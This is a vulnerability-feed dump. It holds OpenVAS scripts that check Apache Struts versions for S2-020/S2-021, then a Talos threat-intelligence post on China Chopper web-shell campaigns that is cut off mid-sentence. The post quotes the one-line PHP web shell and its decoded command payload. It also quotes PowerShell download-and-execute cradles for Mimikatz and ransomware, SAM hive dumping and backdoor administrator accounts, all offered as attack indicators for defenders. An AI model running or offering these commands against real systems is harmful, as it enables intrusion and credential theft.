SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108626\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(65400, 65999);\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-020\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65400\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65999\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.16.2 or later.\");\n\n script_tag(name:\"insight\", value:\"The default upload mechanism in Apache Struts 2 is based on Commons\n FileUpload version 1.3 which is vulnerable and allows DoS attacks. Additional ParametersInterceptor\n allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader\n manipulation.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.1.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters or cause a Denial of Service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.16.2\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108627", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108627", "title": "Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Windows)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108627\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(65400, 65999);\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-020\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65400\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65999\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.16.2 or later.\");\n\n script_tag(name:\"insight\", value:\"The default upload mechanism in Apache Struts 2 is based on Commons\n FileUpload version 1.3 which is vulnerable and allows DoS attacks. Additional ParametersInterceptor\n allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader\n manipulation.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.1.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters or cause a Denial of Service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.16.2\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108629", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108629\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-08-27T16:21:09", "bulletinFamily": "blog", "description": "_By [Paul Rascagneres](<https://www.twitter.com/r00tbsd>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._ \n \n\n\n[](<https://1.bp.blogspot.com/-jBq3FQDBVOA/XVF6aa_P4RI/AAAAAAAAATA/Ct_1ZK5SbSgWnN5H9DtyHPTOZDZtrGZRwCLcBGAs/s1600/image3.jpg>)\n\n### Introduction\n\nThreats will commonly fade away over time as they're discovered, reported on, and detected. But China Chopper has found a way to stay relevant, active and effective nine years after its initial discovery. [China Chopper](<https://attack.mitre.org/software/S0020/>) is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target. Several threat groups have used China Chopper, and over the past two years, we've seen several different campaigns utilizing this web shell and we chose to document three most active campaigns in this blog post. \n \nWe decided to take a closer look at China Chopper after security firm Cybereason reported on a massive attack against telecommunications providers called [\"Operation Soft Cell,\"](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>) which reportedly utilized China Chopper. Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017, which shows that even nine years after its creation, attackers are using China Chopper without significant modifications. \n \nThis web shell is widely available, so almost any threat actor can use. This also means it's nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator. \n \nThe usage of China Chopper in recent campaigns proves that a lot of old threats never really die, and defenders on the internet need to be looking out for malware both young and old. \n \n \n\n\n### What is China Chopper?\n\nChina Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool. The web shell works on different platforms, but in this case, we focused only on compromised Windows hosts. China Chopper is a tool that has been used by some state-sponsored actors such as [Leviathan](<https://attack.mitre.org/groups/G0065/>) and [Threat Group-3390](<https://attack.mitre.org/groups/G0027/>), but during our investigation we've seen actors with varying skill levels. \n \nIn our research, we discovered both Internet Information Services (IIS) and Apache web servers compromised with China Chopper web shells. We do not have additional data about how the web shell was installed, but there are several web application frameworks such as older versions of Oracle WebLogic or WordPress that may have been targeted with known remote code execution or file inclusion exploits. \n \nChina Chopper provides the actor with a simple GUI that allows them to configure servers to connect to and generate server-side code that must be added to the targeted website code in order to communicate. \n \n\n\n[](<https://1.bp.blogspot.com/-Dv9InEUHyds/XVF6hgNog_I/AAAAAAAAATE/DkXog3y-iSgj7xMraPu4RAL6xNYnXg0DwCLcBGAs/s1600/image9.png>)\n\n_China Chopper GUI_\n\n \nThe server-side code is extremely simple and contains, depending on the application platform, just a single line of code. The backdoor supports .NET Active Server Pages or PHP. \n \nHere is an example of a server-side code for a compromised PHP application: \n \n\n \n \n <?php @eval($_POST['test']);?>\n\n \nWe cannot be sure if the simplicity of the server code was a deliberate decision on the part of the China Chopper developers to make detection more difficult, but using pattern matching on such as short snippet may produce some false positive detections. \n \nThe China Chopper client communicates with affected servers using HTTP POST requests. The only function of the server-side code is to evaluate the request parameter specified during the configuration of the server code in the client GUI. In our example, the expected parameter name is \"test.\" The communication over HTTP can be easily spotted in the network packet captures. \n \nChina Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of 'netstat an|find \"ESTABLISHED.\"' and it is very likely that this command will be seen in process creation logs on affected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-JIbBgJHZZEI/XVF6rJ5F1TI/AAAAAAAAATM/G8POGJS2rcsVQhyjqhmPf52Qx7q3wWzDgCLcBGAs/s1600/image4.png>)\n\n_China Chopper's first suggested Terminal command_\n\n \nWhen we analyze the packet capture, we can see that the parameter \"test\" contains another eval statement. \n \nDepending on the command, the client will submit a certain number of parameters, z0 to zn. All parameters are encoded with a standard base64 encoder before submission. Parameter z0 always contains the code to parse other parameters, launch requested commands and return the results to the client. \n \n\n \n \n test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D\n\n \nEncoded China Chopper POST request with parameters \n \nIn this request, the decoded parameters are: \n\n \n \n z0 - @ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\"->|\");;$p=base64_decode($_POST[\"z1\"]);$s=base64_decode($_POST[\"z2\"]);$d=dirname($_SERVER[\"SCRIPT_FILENAME\"]);$c=substr($d,0,1)==\"/\"?\"-c \\\"{$s}\\\"\":\"/c \\\"{$s}\\\"\";$r=\"{$p} {$c}\";@system($r.\" 2>&1\",$ret);print ($ret!=0)?\" \n ret={$ret} \n \":\"\";;echo(\"|<-\");die(); \n \n z1 - cmd \n \n z2 - cd /d \"C:\\xampp\\htdocs\\dashboard\\\"&netstat -an | find \"ESTABLISHED\"&echo [S]&cd&echo [E]\n\n \nThe end of the command \"&echo [S]&cd&echo [E]\" seems to be present in all virtual terminal requests and may be used as a reliable indicator to detect China Chopper activity in packet captures or behavioral logs. \n \nApart from the terminal, China Chopper includes a file manager (with the ability to create directories, download files and change file metadata), a database manager and a rudimentary vulnerability scanner. \n \nWhat follows is our view into three different compromises, each with different goals, tools, techniques and likely different actors. \n \n\n\n[](<https://1.bp.blogspot.com/-_fwmst4cxsc/XVF60IYW4iI/AAAAAAAAATU/NkngLjkJvIk-VOhc8eaB2PyyJZYtFjGFQCLcBGAs/s1600/image7.jpg>)\n\n_Timeline of the observed case studies_\n\n \n\n\n### Case study No. 1: Espionage context\n\nWe identified the usage of China Chopper in a couple of espionage campaigns. Here, we investigate a campaign targeting an Asian government organization. In this campaign, China Chopper was used in the internal network, installed on a few web servers used to store potentially confidential documents. \n \nThe purpose of the attacker was to obtain documents and database copies. The documents were automatically compressed using WinRAR: \n \n\n \n \n cd /d C:\\Windows\\Working_Directory\\ \n renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\\output_directory\\files.rar c:\\directory_to_scan\\\n\n \nThis command is used to create an archive containing documents modified after the date put as an argument. The archives are protected with a strong password containing uppercase, lowercase and special characters. The passwords were longer than 15 characters. \n \nWe assume the attacker ran this command periodically in order to get only new documents and minimize the quantity of exfiltrated data. \n \nOn the same target, we identified additional commands executed with China Chopper using WinRAR: \n \n\n \n \n rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\\directory_to_scan\n\n \nChina Chopper is a public hacking tool and we cannot tell if in this case the attacker is the same actor as before. But the rar command line here is sufficiently different to note that it could be a different actor. The actor used an offensive phrase for a password, which is why we've censored it here. \n \nThe attacker deployed additional tools to execute commands on the system: \n \n\n \n \n C:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe C:\\windows\\temp\\Document.csproj /p:AssemblyName=C:\\windows\\temp\\downloader.png /p:ScriptFile=C:\\windows\\temp\\downloader.dat /p:Key=27_characters_key > random.tmp\n\n \nMSBuild.exe is used to compile and execute a .NET application with two arguments: the ScriptFile argument contains a PowerShell script encrypted with the value of the key argument. Here is the .NET code: \n \n\n\n[](<https://1.bp.blogspot.com/-fyO_pE90tKU/XVF69g6-T_I/AAAAAAAAATc/oNWFm6VZqzsbSD0gCuU9kSQG3hgkxo89QCLcBGAs/s1600/image2.png>)\n\n_.NET loader code_\n\n \nThe .NET loader supports encrypted files or URLs as the script argument. If the operator uses an HTTP request, the loader downloads the payload with one of the hardcoded User-Agents. The loader decrypts the downloaded file and executes it: \n \n\n\n[](<https://1.bp.blogspot.com/-vmu9ILGV2K8/XVF7Hn-FSlI/AAAAAAAAATg/zTv_Bi3jlOU0LwMI17ylxLF_QQOSah_iwCLcBGAs/s1600/image5.png>)\n\n_Hardcoded User-Agent strings_\n\n \nIn our case, the purpose of the decrypted payload was to perform a database dump: \n \n\n \n \n powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\\windows\\help\\help\\helper.ps1; \n Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName; \n Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump\n\n \nThe \"where UID\" condition in the SQL query has the same purpose as the date in the previous WinRAR command. We assume the attacker performs the query periodically and does not want to dump the entire database, but only the new entries. It is interesting to see that after dumping the data, the attacker checks if the generated file is available and if it contains any data: \n \n\n \n \n dir /O:D c:\\working_directory\\db.csv \n powershell -nop -exec bypass Get-Content \"c:\\working_directory\\db.csv\" | Select-Object -First 10\n\n \nHow are the file archives and the database dumps exfiltrated? Since the targeted server is in an internal network, the attacker simply maps a local drive and copies the file to it. \n \n\n \n \n cd /d C:\\working_directory\\ \n net use \\192.168.0.10\\ipc$ /user:USER PASSWORD \n move c:\\working_directory\\db.csv \\192.168.0.10\\destination_directory\n\n \nThe attacker must have access to the remote system in order to exfiltrate data. We already saw the usage of a HTTP tunnel tool to create a network tunnel between the infected system and a C2 server. \n \n\n\n### Case No. 2: Multi-purpose campaign\n\nWe observed another campaign targeting an organisation located in Lebanon. While our first case describes a targeted campaign with the goal to exfiltrate data affecting internal servers, this one is the opposite: an auxiliary public web site compromised by several attackers for different purposes. \n \nWe identified actors trying to deploy ransomware on the vulnerable server using China Chopper. The first attempt was Sodinokibi ransomware: \n \n\n \n \n certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\\Users\\UserA\\AppData\\Local\\Temp\\radm.exe\n\n \nThe second delivered the [Gandcrab ransomware](<https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html>): \n \n\n \n \n If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ \n Start-Process -FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument \"IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000;\" \n } else { \n IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33')); \n Invoke-ACAXGZFTTDUDKY; \n Start-Sleep -s 1000000; \n }\n\n \nHere is the script hosted on Pastebin: \n \n\n\n[](<https://1.bp.blogspot.com/-Y3yXMFaOJ7w/XVF7ZZ8jIaI/AAAAAAAAATs/x5YmFtUD_1AjX2R5uGHlRGvsXiXEkAz5ACLcBGAs/s1600/image8.png>)\n\n_Reflective loader downloaded from pastebin.com_\n\n \nThe script executes a hardcoded PE file located \u2014 Gandcrab \u2014at the end of the script using a reflective DLL-loading technique. \n \nIn addition to the ransomware, we identified another actor trying to execute a Monero miner on the vulnerable server with China Chopper: \n \n\n \n \n Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')\n\n \nHere's a look at the miner configuration: \n \n\n\n[](<https://1.bp.blogspot.com/-HA_kY6CQEW0/XVF7tCD8FkI/AAAAAAAAAT0/oHnijHOyXFs3MVzen70IygrDQay3g_5VgCLcBGAs/s1600/image1.png>)\n\n_Monero miner configuration_\n\n \nSome of the detected activity may have been manual and performed in order to get OS credentials. \n \nTrying to get the registry: \n \n\n \n \n reg save hklm\\sam sam.hive \n reg save hklm\\system system.hive \n reg save hklm\\security security.hive\n\n \nUsing Mimikatz (with a few hiccups along the way): \n \n\n \n \n powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \n\n \n \n powershell IEX\",\"(New-Object\",\"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\n\n \n\n \n \n C:\\Windows\\System32WindowsPowerShell\\v1.0\\powershell.exe IEX \n \n (New-Object\",\"Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz\n\n \n\n \n \n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [Environment]::Is64BitProcess\n\n \n\n \n \n powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \nAttempting to dump password hashes using a PowerShell module and the command line: \n \n\n \n \n IEX (New-Object \n \n Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;\n\n \nThe attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to the multiple attempts to dump the credential, the attackers had to deal with typos: missed spaces, wrong commands or letters switching. \n \nOne of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the \"net use\" commands. \n \nFinally, several remote access tools such as [Gh0stRAT](<https://blog.talosintelligence.com/2019/06/threat-roundup-0607-0614.html>) and Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell. \n \n\n\n### Case No. 3: Web hosting providers compromised\n\nIn one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities. \n\n\n#### Server 1\n\nGenerally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on a single physical server. \n \n\n \n \n cd /d C:\\compromisedappdirectory&net user user pass /add \n cd /d C:\\compromisedappdirectory&net localgroup administrattors user /add\n\n \nNotice the misspelling of the word \"administrators.\" The actor realizes that the addition of the user was not successful and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool \"[Mimikatz Lite](<https://github.com/infosecsmith/MimikatzLite>)\" as GetPassword.exe. \n \nThe tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display retrieved passwords. The only change, compared with the original tool is that actors change the color and the code page of the command window. The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936. \n \nFinally, the actor attempts to dump the database of a popular mobile game \"Clash of Kings,\" possibly hosted on a private server. \n\n\n#### Server 2\n\nAn actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner just as we found commodity malware on other systems compromised with China Chopper. \n \nThe actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall and finally launch the mining payload. \n \n\n \n \n C:\\Windows\\system32\\icacls.exe C:\\Windows\\Temp /Reset /T \n C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\Temp \n C:\\Windows\\system32\\netsh.exe Firewall Add AllowedProgram C:\\Windows\\Temp\\lsass.eXe Windows Update Enable \n C:\\Windows\\Temp\\lsass.eXe\n\n#### Server 3\n\nThe attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them. \n \nThe actor attempts to exploit [CVE-2018\u20138440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified [proof-of-concept exploit](<https://github.com/GossiTheDog/zeroday>). \n \n\n \n \n cd /d C:\\directoryofcompromisedapp&rundll32 C:\\directoryofcompromisedapp\\ALPC-TaskSched-LPE.dll,a\n\n \nThe attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and change DACLs to allow the users to modify certain operating system objects. \n \nThe attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign. \n \n\n \n \n cacls \\. C:\\path_to_a_website /T /E /C /G Everyone:F\n\n \nFinally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save the credentials into a text file: \n \n\n \n \n powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File \n -Encoding ASCII outputfile.txt\n\n \n\n\n#### Server 4\n\nThe China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities [CVE-2015-0062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-0062>), [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-1701>) and [CVE-2016-0099](<https://www.cvedetails.com/cve/CVE-2016-0099/>) to allow the attacker to modify other objects on the server. \n \nOnce the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group. \n \n\n \n \n net user admin admin /ad \n net localgroup administrators admin /ad\n\n \nThe attacker next logs on to the server with a newly created user account and launches a free tool replacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with another string. Once again, this could be used to affect all sites hosted on the server or simply deface pages. \n \n\n\n### Conclusion\n\nInsecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems. \n \nAlthough China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group. \n \nIn our research we documented three separate campaigns active over a period of several months. This corroborates the claim that an average time to detect an intrusion 